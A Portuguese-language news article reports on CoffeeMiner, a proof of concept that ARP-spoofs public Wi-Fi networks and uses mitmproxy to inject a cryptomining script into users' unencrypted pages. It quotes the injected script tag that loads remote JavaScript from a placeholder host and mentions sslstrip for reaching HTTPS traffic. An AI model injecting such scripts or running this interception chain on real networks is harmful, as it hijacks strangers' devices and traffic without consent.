CoffeeMiner – Hackeando WiFi networks para minerar criptomoedas

Um desenvolvedor publicou uma prova de conceito chamada CoffeeMiner para hackear redes Wi-Fi públicas para gerar criptomoedas.

O pico nos valores do Bitcoin está atraindo o interesse dos criminosos que estão adotando métodos para roubar carteiras de critpto e ainda, usar recursos computacionais das vítimas.

O desenvolvedor, de nome Arnau publicou um POC denonimado CofferMiner que tem como intenção hackear redes Wi-Fi tendo a capacidade de injetar códigos maliciosos em sessões de navegação conectadas, um método engenhoso para monetizar os esforços ilegais rapidamente.

Arnau explica o seu ataque MITM ( Man in the Middle ) para injetar um javasccript nas páginas html acessadas pelos usuários conectados, de modo que todos os dispositivos conectados na rede Wi-Fi seriam forçado a servir de estações de mineração para os atacantes.

 

 

O CoffeMiner funciona através do Spoofing ( falsificação ) de menagens do protocolo de resolução de endereços ( ARP ) em uma rede local para interceptar o tráfego não criptografado dos outros dispositivos da rede.

O ataque MITM é conduzido usando um software chamado mitmproxy que permite injetar a linha abaixo no código HTML não criptografado relacionado ao conteúdo que é solicitado por outros usuários da rede.

<script src=”https://httpserverIP:8000/script.js” type=”text/javascript”></script>

“Mitmproxy é uma ferramenta de software que nos permite analisar o tráfego que passa por um host e permite editar esse tráfego. No nosso caso, vamos usá-lo para injetar o javascript nas páginas html. ” escreve Arnau.

“Para tornar o processo mais limpo, só injetaremos uma linha de código nas páginas html. E será essa linha de código html que irá chamar o javascript de mineração de criptomoedas “.

Quando o navegador do usuário carrega as páginas com código injetado ele carrega o javascript e usa o tempo de CPU para gerar Monero ( sempre ela, Monero ) usando o software CoinHive.

Arnau configurou uma máquina VirtualBox para demonstrar o ataque e também publicou alguns vídeos do POC em um ambiente virtualizado e em uma rede Wi-Fi real.

A versão do CoffeMiner publicada pelo pesquisador não funciona com HTTPS mas a limitação pode ser ignorada usando o sslstrip.

“Outra característica adicional, poderia ser adicionar sslstrip, para garantir a injeção também nos sites que o usuário esteja acessando via HTTPS”, concluiu o pesquisador.

Arnau publicou o projeto do CoffeMiner no GitHub. Muita gente já deve estar servindo de estação de mineração para algumas pessoas que podem estar por aí usando redes públicas que em geral, não tem proteção nenhuma.

Via SecurityAffairs